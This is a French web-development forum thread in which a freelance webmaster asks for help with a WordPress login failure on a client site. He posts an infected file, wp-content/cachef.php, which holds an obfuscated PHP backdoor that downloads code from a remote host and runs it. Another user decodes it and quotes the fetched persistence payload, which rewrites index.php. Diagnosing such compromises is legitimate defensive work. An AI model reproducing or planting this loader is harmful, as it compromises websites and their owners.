IdentifiantMot de passe
Loading...
Mot de passe oubli� ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les r�ponses en temps r�el, voter pour les messages, poser vos propres questions et recevoir la newsletter

PHP & Base de donn�es Discussion :

Fatal error impossible de me login sur le site

Sujet :

PHP & Base de donn�es

Nouveau candidat au Club
    Homme Profil pro
    Webmaster
    Inscrit en
    Novembre 2023
    D�tails du profil
    Informations personnelles :
    �ge : 24

Informations professionnelles :
    Activit� : Webmaster
    Secteur : High Tech - Multim�dia et Internet

Informations forums :
    Par d�faut Fatal error impossible de me login sur le site
    Bonjour � tous,

Je suis webmaster en freelance et j'ai eu la mauvaise surprise ce matin qu'un de mes clients n'arrivait pas a se connecter sur son site.

Je me suis donc rendu dessus 'Wolz.fr' et cela me mettais que le mdp n'etait pas le bon bref, j'ai modifier le mdp dans phpmyadmin en pensant bien a mettre md5 dans le champs fonction pour que wordpress puisse bien lire le mdp crypt�.

Et mtn je me retrouve avec cette erreur

Warning: Undefined array key "cy" in /home/wolzfrp/www/wp-content/cachef.php on line 1

Warning: Undefined array key "cy" in /home/wolzfrp/www/wp-content/cachef.php on line 1

Fatal error: Uncaught Error: Undefined constant "cnt" in /home/wolzfrp/www/wp-includes/user.php:199 Stack trace: #0 /home/wolzfrp/www/wp-includes/user.php(200): getx('http://s.newnda...') #1 /home/wolzfrp/www/wp-includes/class-wp-hook.php(310): wp_authenticate_username_password(Object(WP_User), 'wolz', 'wolz') #2 /home/wolzfrp/www/wp-includes/plugin.php(205): WP_Hook->apply_filters(NULL, Array) #3 /home/wolzfrp/www/wp-includes/pluggable.php(618): apply_filters('authenticate', NULL, 'wolz', 'wolz') #4 /home/wolzfrp/www/wp-includes/user.php(106): wp_authenticate('wolz', 'wolz') #5 /home/wolzfrp/www/wp-login.php(1241): wp_signon(Array, true) #6 {main} thrown in /home/wolzfrp/www/wp-includes/user.php on line 199
    J'ai essayer dans le ftp de retirer le fichier cachef mais le site devient totalement inutilisable apres donc ce n'est pas la bonne solution.
    J'ai desactiver les plugins et les themes depuis le serveur ftp mais rien y fait.

et ENFIN j'ai fait des restauration de sauvegarde (ftp et bdd) d'il y a 1 semaine (ou tout allais bien) mais toujours le m�me probleme de mot de passe j'ai essayer de mettre une fonction dans function.php qui cr�er un user admin a chaque refresh d'une page mais sans reponses.

Si quelqu'un peut m'�clairer par rapport a ce probl�me je ne pense pas �tre le seul dans ce cas, je n'ai jamais poster dans un forum mais vous �tes mon dernier espoir :,)

Nouveau candidat au Club
    Homme Profil pro
    Webmaster
    Inscrit en
    Novembre 2023
    D�tails du profil
    �ge : 24

Activit� : Webmaster
    Secteur : High Tech - Multim�dia et Internet

Informations forums :
    Par d�faut Fichier cachef.php
    Je ne vois pas "cy" a part la et l'erreur m'indique que c'est a partir de cette ligne la

Code : S�lectionner tout - Visualiser dans une fen�tre � part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    if($f_size($idx_path) == 9399 && $_GET[base64_decode(base64_decode("WTNrPQ=="))]==base64_decode(base64_decode("TVE9PQ==")))
    {  

$c22="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f\x63\x79\x2f\x63\x79\x2e\x67\x69\x66";
      $cy_code=@$f_get($c22); 

if($cy_code)
    { $cy_path=$_SERVER[base64_decode(base64_decode("UkU5RFZVMUY="))
    . base64_decode(base64_decode("VGxSZlVrOVBWQT09"))]
    . base64_decode(base64_decode("TDJONVltOXladz09"))
    . base64_decode(base64_decode("WDNSdGNDND0="))
    .base64_decode(base64_decode("Y0E9PQ=="))
    .base64_decode(base64_decode("YUhBPQ=="));

@$f_put($cy_path, $cy_code); 
    $v32 = array(base64_decode("c3Ns") => array(base64_decode("dmVyaWZ5X3BlZXI=") => false, base64_decode("dmVyaWZ5X3BlZXJfbmFtZQ==") => false, ), base64_decode(base64_decode("YUhSMGNBPT0=")) => array( base64_decode(base64_decode("YldWMGFHOWs=")) => base64_decode("R0VU"), base64_decode(base64_decode("ZEdsdFpXOTFkQT09")) => base64_decode("Mw=="), ), );
    $v13 = (isset($_SERVER[base64_decode("SFRUUFM=")]) && $_SERVER[base64_decode("SFRUUFM=")] == base64_decode("b24=")) ? base64_decode(base64_decode("YUhSMGNITT0=")) : base64_decode(base64_decode("YUhSMGNBPT0="));
    $d20 = $_SERVER[base64_decode("SFRUUF9IT1NU")];
    $e35=$v13.base64_decode(base64_decode("T2k4dg=="))
    .$d20.base64_decode(base64_decode("TDJONVltOXladz09"))
    . base64_decode(base64_decode("WDNSdGNDND0="))
    .base64_decode(base64_decode("Y0E9PQ=="))
    .base64_decode(base64_decode("YUhBPQ=="));
    @$f_get($e35, false, stream_context_create($v32)); $f5 = @$un_link($cy_path);  }   } ?>

Membre chevronn�
    Homme Profil pro
    Urbaniste
    Inscrit en
    Ao�t 2023
    D�tails du profil

Activit� : Urbaniste

Informations forums :
    Par d�faut
    Bonjour,

il est marrant ton truc, �a d�code (ou �a tente de d�coder ...) une url (http://s.newnday.xyz/cy/cy.gif) qui pisse un truc genre

"HTTP/1.1 200 OK\r\nContent-Length: 921\r\nAccept-Ranges: bytes\r\nConnection: keep-alive\r\nContent-Type: image/gif\r\nDate: Wed, 08 Nov 2023 11:28:27 GMT\r\nEtag: \"65377252-399\"\r\nLast-Modified: Tue, 24 Oct 2023 07:29:22 GMT\r\nServer: nginx/1.25.2\r\n\r\n<?php\r\nset_time_limit(99 - 99);\r\nignore_user_abort(1);\r\n @unlink(__FILE__);\r\nfunction auto_restore_memory()\r\n{\r\n $index_path = $_SERVER['DOCUMENT_ROOT'] . '/index.php';\r\n $flag_filename = $_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH';\r\n @unlink($flag_filename);\r\n $index_code = @file_get_contents($index_path);\r\n while (1) {\r\n clearstatcache();\r\n if (file_exists($flag_filename)){\r\n break;\r\n }\r\n if (!file_exists($index_path) or @file_get_contents($index_path) != $index_code) {\r\n @chmod($index_path, 438);\r\n @unlink($index_path);\r\n @file_put_contents($index_path, $index_code);\r\n @chmod($index_path, 292);\r\n }\r\n sleep(2);\r\n }\r\n}\r\n\r\nob_end_clean();\r\nheader(\"Connection: close\");\r\nob_start();\r\necho 888;\r\nheader(\"Content-Length: \" . ob_get_length());\r\nob_end_flush();\r\nflush();\r\n\r\n\r\nauto_restore_memory();\r\n\r\n?>"
    Bonne journ�e.

Discussions similaires

1. Connexion/login sur un site via Jsoup
    Par lRedOx dans le forum D�veloppement Web en Java
    R�ponses: 5
    Dernier message: 09/03/2016, 11h23
  2. Login sur un site de paris en ligne
    Par gamin2paname dans le forum G�n�ral Java
    R�ponses: 1
    Dernier message: 16/07/2011, 09h58
  3. Formulaire login sur un site dynamic data
    Par cyclopsnet dans le forum ASP.NET